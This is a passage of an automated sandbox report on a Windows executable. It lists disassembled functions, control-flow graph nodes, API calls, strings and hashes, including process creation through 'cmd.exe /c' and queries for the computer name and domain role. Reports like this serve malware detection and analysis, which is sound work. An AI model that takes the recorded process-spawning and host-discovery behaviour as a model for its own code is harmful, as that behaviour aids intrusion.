                                      control_flow_graph 4266 965042-965089 GetCurrentProcess DuplicateHandle 4267 965092-9650af call 9760dd call 977a3d 4266->4267 4268 96508b-96508d 4266->4268 4267->4268 4276 9650b1-9650bf call 96549c 4267->4276 4269 965260-965264 4268->4269 4272 965266-965269 CloseHandle 4269->4272 4273 96526f-965277 4269->4273 4272->4273 4279 9650c1-9650c3 4276->4279 4280 9650c8-9650d2 call 9652db 4276->4280 4281 965252-965257 4279->4281 4286 9650d4-9650d9 4280->4286 4287 9650db-9650e0 4280->4287 4281->4269 4283 965259-96525f call 9625ba 4281->4283 4283->4269 4289 9650e3-965109 call 959190 4286->4289 4287->4289 4292 965113-965120 4289->4292 4293 96510b-965111 4289->4293 4294 965122 4292->4294 4295 965125-965130 4292->4295 4293->4294 4294->4295 4296 965133-965138 4295->4296 4296->4296 4297 96513a-965141 4296->4297 4298 965144-965149 4297->4298 4298->4298 4299 96514b-965150 4298->4299 4300 965153-965158 4299->4300 4300->4300 4301 96515a-965174 call 975508 4300->4301 4304 965235 4301->4304 4305 96517a-965189 call 9729c2 4301->4305 4306 965237-965249 call 975565 * 2 4304->4306 4310 96518f-9651a0 call 9773e8 4305->4310 4311 965278-965284 call 96595f 4305->4311 4306->4281 4320 96524b-96524f 4306->4320 4310->4311 4319 9651a6-9651b5 call 9773e8 4310->4319 4319->4311 4323 9651bb-9651c9 call 965319 4319->4323 4320->4281 4323->4304 4326 9651cb-965207 CreateProcessA 4323->4326 4327 965210-965228 CloseHandle 4326->4327 4328 965209-96520e 4326->4328 4329 96522a-965233 call 975565 4327->4329 4328->4329 4329->4306
                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 0096504D
                                      • DuplicateHandle.KERNELBASE(00000000,?,00000000,000000FF,00000000,00000001,00000002), ref: 00965081
                                      • CloseHandle.KERNEL32(000000FF), ref: 00965269
                                        • Part of subcall function 0096595F: IsProcessorFeaturePresent.KERNEL32(00000017,00965931,?,?,008B1F07,?,?,00000016,?,?,0096593E,00000000,00000000,00000000,00000000,00000000), ref: 00965961
                                        • Part of subcall function 0096595F: GetCurrentProcess.KERNEL32(C0000417,?,?,?), ref: 00965983
                                        • Part of subcall function 0096595F: TerminateProcess.KERNEL32(00000000), ref: 0096598A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Process$CurrentHandle$CloseDuplicateFeaturePresentProcessorTerminate
                                      • String ID: /c $D$cmd.exe
                                      • API String ID: 1167604731-1597775715
                                      • Opcode ID: 84cded117038e32bb57b64ac20debebe999927f0ecaa046104cc7fa6660148fb
                                      • Instruction ID: cc87ac5a30ba03870ef88b82338f6c63ea10d332aba85ba33ad043ba459eafde
                                      • Opcode Fuzzy Hash: 84cded117038e32bb57b64ac20debebe999927f0ecaa046104cc7fa6660148fb
                                      • Instruction Fuzzy Hash: 8171E572A04A09AFDF20CFB8CC45BAEBBB9EF85354F154129F818A7251D7719E01DB50
                                      Function 009792A2 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 4332 9792a2-9792b2 4333 9792b4-9792c7 call 9661b0 call 9661c3 4332->4333 4334 9792cc-9792ce 4332->4334 4348 97964e 4333->4348 4335 979636-979643 call 9661b0 call 9661c3 4334->4335 4336 9792d4-9792da 4334->4336 4353 979649 call 965932 4335->4353 4336->4335 4338 9792e0-97930b 4336->4338 4338->4335 4342 979311-97931a 4338->4342 4346 979334-979336 4342->4346 4347 97931c-97932f call 9661b0 call 9661c3 4342->4347 4351 979632-979634 4346->4351 4352 97933c-979340 4346->4352 4347->4353 4354 979651-979656 4348->4354 4351->4354 4352->4351 4356 979346-97934a 4352->4356 4353->4348 4356->4347 4359 97934c-979363 4356->4359 4361 979365-979368 4359->4361 4362 979380-979389 4359->4362 4365 979372-97937b 4361->4365 4366 97936a-979370 4361->4366 4363 9793a7-9793b1 4362->4363 4364 97938b-9793a2 call 9661b0 call 9661c3 call 965932 4362->4364 4369 9793b3-9793b5 4363->4369 4370 9793b8-9793d6 call 976393 call 975565 * 2 4363->4370 4397 979569 4364->4397 4367 97941c-979436 4365->4367 4366->4364 4366->4365 4372 97943c-97944c 4367->4372 4373 97950a-979513 call 980447 4367->4373 4369->4370 4401 9793f3-979419 call 9797f5 4370->4401 4402 9793d8-9793ee call 9661c3 call 9661b0 4370->4402 4372->4373 4377 979452-979454 4372->4377 4384 979586 4373->4384 4385 979515-979527 4373->4385 4377->4373 4381 97945a-979480 4377->4381 4381->4373 4386 979486-979499 4381->4386 4389 97958a-9795a2 ReadFile 4384->4389 4385->4384 4391 979529-979538 GetConsoleMode 4385->4391 4386->4373 4392 97949b-97949d 4386->4392 4395 9795a4-9795aa 4389->4395 4396 9795fe-979609 GetLastError 4389->4396 4391->4384 4398 97953a-97953e 4391->4398 4392->4373 4393 97949f-9794ca 4392->4393 4393->4373 4400 9794cc-9794df 4393->4400 4395->4396 4405 9795ac 4395->4405 4403 979622-979625 4396->4403 4404 97960b-97961d call 9661c3 call 9661b0 4396->4404 4399 97956c-979576 call 975565 4397->4399 4398->4389 4406 979540-97955a ReadConsoleW 4398->4406 4399->4354 4400->4373 4408 9794e1-9794e3 4400->4408 4401->4367 4402->4397 4415 979562-979568 call 96618d 4403->4415 4416 97962b-97962d 4403->4416 4404->4397 4412 9795af-9795c1 4405->4412 4413 97955c GetLastError 4406->4413 4414 97957b-979584 4406->4414 4408->4373 4418 9794e5-979505 4408->4418 4412->4399 4422 9795c3-9795c7 4412->4422 4413->4415 4414->4412 4415->4397 4416->4399 4418->4373 4426 9795e0-9795eb 4422->4426 4427 9795c9-9795d9 call 978fbe 4422->4427 4432 9795f7-9795fc call 978dfe 4426->4432 4433 9795ed call 97910e 4426->4433 4439 9795dc-9795de 4427->4439 4437 9795f2-9795f5 4432->4437 4433->4437 4437->4439 4439->4399
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: 0-3907804496
                                      • Opcode ID: 08e8f60fd4b11124f448c2947b02698b53abf7c86947dcf03a6e754cd281f98d
                                      • Instruction ID: 24fa56e93c4814aa3703a7605beaa9240db409bfdf2e2ed2cf8464395c8b4958
                                      • Opcode Fuzzy Hash: 08e8f60fd4b11124f448c2947b02698b53abf7c86947dcf03a6e754cd281f98d
                                      • Instruction Fuzzy Hash: 36C1E572D0825A9FDF12DFA8C845BADBBB8FF4A310F148185F918A7392C7359941CB60
                                      Function 00980E90 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 4440 980e90-980ec0 call 980bf3 4443 980edb-980ee7 call 97d47e 4440->4443 4444 980ec2-980ecd call 9661b0 4440->4444 4449 980ee9-980efe call 9661b0 call 9661c3 4443->4449 4450 980f00-980f49 call 980b5e 4443->4450 4451 980ecf-980ed6 call 9661c3 4444->4451 4449->4451 4460 980f4b-980f54 4450->4460 4461 980fb6-980fbf GetFileType 4450->4461 4458 9811b2-9811b8 4451->4458 4465 980f8b-980fb1 GetLastError call 96618d 4460->4465 4466 980f56-980f5a 4460->4466 4462 981008-98100b 4461->4462 4463 980fc1-980ff2 GetLastError call 96618d CloseHandle 4461->4463 4469 98100d-981012 4462->4469 4470 981014-98101a 4462->4470 4463->4451 4479 980ff8-981003 call 9661c3 4463->4479 4465->4451 4466->4465 4471 980f5c-980f89 call 980b5e 4466->4471 4475 98101e-98106c call 97d3c7 4469->4475 4470->4475 4476 98101c 4470->4476 4471->4461 4471->4465 4482 98107c-9810a0 call 980911 4475->4482 4483 98106e-981070 call 980d6f 4475->4483 4476->4475 4479->4451 4490 9810a2 4482->4490 4491 9810b3-9810f6 4482->4491 4487 981075-98107a 4483->4487 4487->4482 4489 9810a4-9810ae call 97615c 4487->4489 4489->4458 4490->4489 4493 9810f8-9810fc 4491->4493 4494 981117-981125 4491->4494 4493->4494 4498 9810fe-981112 4493->4498 4495 98112b-98112f 4494->4495 4496 9811b0 4494->4496 4495->4496 4499 981131-981164 CloseHandle call 980b5e 4495->4499 4496->4458 4498->4494 4502 981198-9811ac 4499->4502 4503 981166-981192 GetLastError call 96618d call 97d590 4499->4503 4502->4496 4503->4502
                                      APIs
                                        • Part of subcall function 00980B5E: CreateFileW.KERNEL32(00000000,00000000,?,00980F39,?,?,00000000,?,00980F39,00000000,0000000C), ref: 00980B7B
                                      • GetLastError.KERNEL32 ref: 00980FA4
                                      • __dosmaperr.LIBCMT ref: 00980FAB
                                      • GetFileType.KERNEL32(00000000), ref: 00980FB7
                                      • GetLastError.KERNEL32 ref: 00980FC1
                                      • __dosmaperr.LIBCMT ref: 00980FCA
                                      • CloseHandle.KERNEL32(00000000), ref: 00980FEA
                                      • CloseHandle.KERNEL32(?), ref: 00981134
                                      • GetLastError.KERNEL32 ref: 00981166
                                      • __dosmaperr.LIBCMT ref: 0098116D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                      • String ID: H
                                      • API String ID: 4237864984-2852464175
                                      • Opcode ID: ad0c9f7a81d36c8e8451f301b3b42e976a5f32399754a9a84d207ca2bd021585
                                      • Instruction ID: 7f3de645aaeb886522b3d77cb951d038db1db0ab7851f5d56fee2a06c528b8d2
                                      • Opcode Fuzzy Hash: ad0c9f7a81d36c8e8451f301b3b42e976a5f32399754a9a84d207ca2bd021585
                                      • Instruction Fuzzy Hash: B1A16832A181458FCF19EF68CC46BAE7BB4AF46324F14014AF815DB392DB358D46CB91
                                      Function 00977EC1 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 212COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 4508 977ec1-977ecf 4509 977ed1-977ee4 call 9661c3 call 965932 4508->4509 4510 977ee9-977eec 4508->4510 4519 9780ca-9780ce 4509->4519 4510->4509 4511 977eee-977ef3 4510->4511 4511->4509 4514 977ef5-977ef9 4511->4514 4514->4509 4516 977efb-977efe 4514->4516 4516->4509 4518 977f00-977f26 call 985580 * 2 4516->4518 4524 977fb7-977fb9 4518->4524 4525 977f2c-977f2e 4518->4525 4526 977fbf 4524->4526 4527 977fbb-977fbd 4524->4527 4528 977f34-977f40 call 985580 4525->4528 4529 977fc1-977fd5 call 985580 4525->4529 4526->4529 4527->4526 4527->4529 4528->4529 4534 977f42-977f44 4528->4534 4535 977fd7-977fe2 call 977661 4529->4535 4536 978001 4529->4536 4537 977f47-977f4c 4534->4537 4545 978095-978098 4535->4545 4546 977fe8-977ff2 call 9780dc 4535->4546 4539 978004-978009 4536->4539 4537->4537 4540 977f4e-977f67 call 975508 4537->4540 4539->4539 4542 97800b-978021 call 975508 4539->4542 4553 977f77-977f8a call 9729c2 4540->4553 4554 977f69-977f72 call 975565 4540->4554 4551 978023-978026 4542->4551 4552 97802b-97803c call 9729c2 4542->4552 4549 9780bf-9780c5 call 975565 4545->4549 4556 977ff7-977ffc 4546->4556 4566 9780c7-9780c9 4549->4566 4557 9780b8-9780be call 975565 4551->4557 4567 978042-97805c call 9661c3 4552->4567 4568 9780d1-9780db call 96595f 4552->4568 4570 977f90-977f9f call 9773e8 4553->4570 4571 9780cf 4553->4571 4554->4566 4556->4549 4557->4549 4566->4519 4578 97805f-97807c call 9729c2 call 977661 4567->4578 4570->4571 4579 977fa5-977fb5 call 975565 4570->4579 4571->4568 4587 97807e-97808c 4578->4587 4588 97809a-9780b6 call 9661c3 call 9780dc 4578->4588 4579->4529 4587->4578 4589 97808e-978094 call 975565 4587->4589 4588->4557 4589->4545
                                      APIs
                                      • _strrchr.LIBCMT ref: 00977F05
                                      • _strrchr.LIBCMT ref: 00977F10
                                      • _strrchr.LIBCMT ref: 00977F37
                                      • _free.LIBCMT ref: 00977F6A
                                        • Part of subcall function 0096595F: IsProcessorFeaturePresent.KERNEL32(00000017,00965931,?,?,008B1F07,?,?,00000016,?,?,0096593E,00000000,00000000,00000000,00000000,00000000), ref: 00965961
                                        • Part of subcall function 0096595F: GetCurrentProcess.KERNEL32(C0000417,?,?,?), ref: 00965983
                                        • Part of subcall function 0096595F: TerminateProcess.KERNEL32(00000000), ref: 0096598A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: _strrchr$Process$CurrentFeaturePresentProcessorTerminate_free
                                      • String ID: .com
                                      • API String ID: 1283974128-4200470757
                                      • Opcode ID: 7f8dbd3d5378b2b270baf113b13094851dcffe663d1eb32efd44374c69a2af25
                                      • Instruction ID: 276cc3909477e0a840f1722f69ff49b09c86e8221abef43ea9411217eee99155
                                      • Opcode Fuzzy Hash: 7f8dbd3d5378b2b270baf113b13094851dcffe663d1eb32efd44374c69a2af25
                                      • Instruction Fuzzy Hash: 73512873904605AFDF10AEB48C45BAFBBA8EF81720F148569F818D7292FF718E049761
                                      Function 009776B6 Relevance: 7.7, APIs: 5, Instructions: 198pipeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 5528 9776b6-9776ce call 942380 5531 9776f1-97770a 5528->5531 5532 9776d0-9776e8 call 9661b0 call 9661c3 call 965932 5528->5532 5534 97770c-97771f call 9661b0 call 9661c3 call 965932 5531->5534 5535 977728-97773a 5531->5535 5556 9776eb-9776f0 call 9423c6 5532->5556 5552 977724-977726 5534->5552 5535->5534 5537 97773c-97776c CreatePipe 5535->5537 5540 97776e-97777b GetLastError call 96618d 5537->5540 5541 97777d-977789 call 97d47e 5537->5541 5540->5552 5553 9777b4-9777fd call 977822 call 97d47e 5541->5553 5554 97778b-9777af call 9661c3 call 9661b0 CloseHandle * 2 5541->5554 5552->5556 5567 9777ff-977815 5553->5567 5568 97782a-97787f call 977932 call 970c7a 5553->5568 5554->5552 5567->5554 5573 977885-97788f 5568->5573 5574 97793a-97795b call 96595f call 942380 5568->5574 5576 977891-977897 5573->5576 5577 97789e-9778cb 5573->5577 5589 97796d-977973 5574->5589 5590 97795d-977968 call 9661c3 5574->5590 5579 9778d0-9778d2 5576->5579 5580 977899-97789c 5576->5580 5577->5579 5582 977906-977925 call 97d3c7 * 2 5579->5582 5583 9778d4-977901 5579->5583 5580->5577 5580->5579 5582->5556 5583->5582 5592 977985-977987 5589->5592 5593 977975-977980 call 9661c3 5589->5593 5602 977a30 call 965932 5590->5602 5596 977a25-977a2a call 9661c3 5592->5596 5597 97798d-977993 5592->5597 5604 977a35 5593->5604 5596->5602 5597->5596 5601 977999-9779b5 5597->5601 5601->5596 5605 9779b7-9779d1 call 974e7f 5601->5605 5602->5604 5607 977a37-977a3c call 9423c6 5604->5607 5605->5604 5611 9779d3-9779e2 call 974d22 5605->5611 5615 9779e4-9779ef call 9661c3 5611->5615 5616 9779f1-977a19 call 977a1b 5611->5616 5615->5604 5616->5607
                                      APIs
                                      • CreatePipe.KERNEL32(?,?,0000000C,?,?,?,?,?,?,?,?,009CCFE0,00000028,00964F9F,?,00000400), ref: 00977764
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,009CCFE0,00000028,00964F9F,?,00000400,00000080,009CCBE0,00000028), ref: 0097776E
                                      • __dosmaperr.LIBCMT ref: 00977775
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,009CCFE0,00000028,00964F9F,?,00000400,00000080,009CCBE0,00000028), ref: 009777A0
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,009CCFE0,00000028,00964F9F,?,00000400,00000080,009CCBE0,00000028), ref: 009777A9
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: CloseHandle$CreateErrorLastPipe__dosmaperr
                                      • String ID:
                                      • API String ID: 155357802-0
                                      • Opcode ID: 2c6973b828a4992128156b648dd0a53c5f403f59d80509411d43fff497bc6496
                                      • Instruction ID: c0af205d605b3e0d4cacddd772bb272573a4fa96e2c848b58830b872b1bcf048
                                      • Opcode Fuzzy Hash: 2c6973b828a4992128156b648dd0a53c5f403f59d80509411d43fff497bc6496
                                      • Instruction Fuzzy Hash: 84714C72A1D2028FCB05AFB8DC45B9E77A5AF85324F188219F458CF2E2D734D802D750
                                      Function 00977451 Relevance: 7.6, APIs: 5, Instructions: 64synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WaitForSingleObject.KERNEL32(00000010,00000000,00000000,00000000,00000000,?,?,0096559C,00000000,00000000,00000001,?,009CCBC0,00000010,008B8943,00000000), ref: 00977474
                                      • GetExitCodeProcess.KERNEL32(00000010,00000000), ref: 00977483
                                      • GetLastError.KERNEL32(?,?,0096559C,00000000,00000000,00000001,?,009CCBC0,00000010,008B8943,00000000), ref: 0097749A
                                      • __dosmaperr.LIBCMT ref: 009774BE
                                      • CloseHandle.KERNEL32(00000010,?,?,0096559C,00000000,00000000,00000001,?,009CCBC0,00000010,008B8943,00000000), ref: 009774D1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait__dosmaperr
                                      • String ID:
                                      • API String ID: 2013101682-0
                                      • Opcode ID: ff81c91e6ce1ba9fd8108e51aa7113889108a05ad0bda5360c5beb28bfa07127
                                      • Instruction ID: 880b8830b6995b471449f74a76434db286ed25a9bfe92baf2b72f707dcfe65f2
                                      • Opcode Fuzzy Hash: ff81c91e6ce1ba9fd8108e51aa7113889108a05ad0bda5360c5beb28bfa07127
                                      • Instruction Fuzzy Hash: A011E93320C211ABC7105FDD8C84A6AFF6EEF82324B258215F95C87260EB348D018BA1
                                      Function 008C4080 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 399COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetComputerNameExW.KERNEL32(00000000,?,?,BA3649C5,?), ref: 008C4101
                                      • DsRoleGetPrimaryDomainInformation.NETAPI32(00000000,00000001,?,?,00000000,?,?,?), ref: 008C41A0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ComputerDomainInformationNamePrimaryRole
                                      • String ID: Empty$_D:
                                      • API String ID: 1590873629-2874341529
                                      • Opcode ID: df7e5ab5743cb4d753eb936fd351f72071cbdefc2d901a89d253466119c36b53
                                      • Instruction ID: d113e9de387377d9bac8b390d36c218f0def527476e6d60d81ddd769225b3a5b
                                      • Opcode Fuzzy Hash: df7e5ab5743cb4d753eb936fd351f72071cbdefc2d901a89d253466119c36b53
                                      • Instruction Fuzzy Hash: 0EF1AC70A102588BEB28DB28CD55BADB7B6FB81304F54C2DCD089A7295DF759AC48FD0
                                      Function 0093D240 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 158COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(BA3649C5,?,00000000,?), ref: 0093D277
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0093D35B
                                      • GetFileAttributesW.KERNEL32(?,BA3649C5,?,?,?,?,?,?,?,009907C0,000000FF,?,008B4A32), ref: 0093D3B2
                                      Strings
                                      • boost::filesystem::status, xrefs: 0093D30D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: AttributesErrorException@8FileLastThrow
                                      • String ID: boost::filesystem::status
                                      • API String ID: 1873943377-3746320807
                                      • Opcode ID: dc3a11ce50061a4dbdd6a146104026dc9a345114cf367d4d25837b5ed66321d8
                                      • Instruction ID: 5a4d6f2fabd2e561907cb7debc36d539fc7cd53e8837822e722ba848f776bcef
                                      • Opcode Fuzzy Hash: dc3a11ce50061a4dbdd6a146104026dc9a345114cf367d4d25837b5ed66321d8
                                      • Instruction Fuzzy Hash: 3B418272D016189BCB10DF98E895BEEB7B8FF45314F14412AE826A7294D774AD04CF91
                                      Function 0093D370 Relevance: 6.1, APIs: 4, Instructions: 139fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNEL32(?,BA3649C5,?,?,?,?,?,?,?,009907C0,000000FF,?,008B4A32), ref: 0093D3B2
                                      • CreateFileW.KERNEL32(?,00000000,00000007,00000000,00000003,02000000,00000000,?,?,?,?,?,?,?,?,009907C0), ref: 0093D44D
                                        • Part of subcall function 0093D060: CreateFileW.KERNEL32(0093D47E,00000008,00000007,00000000,00000003,02200000,00000000,BA3649C5,?,00000000,?,0093D47E,?), ref: 0093D0A3
                                        • Part of subcall function 0093D060: CloseHandle.KERNEL32(00000000), ref: 0093D124
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,009907C0), ref: 0093D499
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,009907C0), ref: 0093D4A9
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: CloseFileHandle$Create$Attributes
                                      • String ID:
                                      • API String ID: 2696689969-0
                                      • Opcode ID: 031186d2737fdcc2dbf622715f94addd954ee4f67e585a1db9cec23fd55e92b3
                                      • Instruction ID: 84073873ff5242f840dece837a04778a272036b9aa49e3d18488631c4ca86d05
                                      • Opcode Fuzzy Hash: 031186d2737fdcc2dbf622715f94addd954ee4f67e585a1db9cec23fd55e92b3
                                      • Instruction Fuzzy Hash: 70519F71E01214EFDB04DFA8E895BAEBBB8EF48314F148129E815A7391D734AD04CFA1
                                      Function 00965992 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
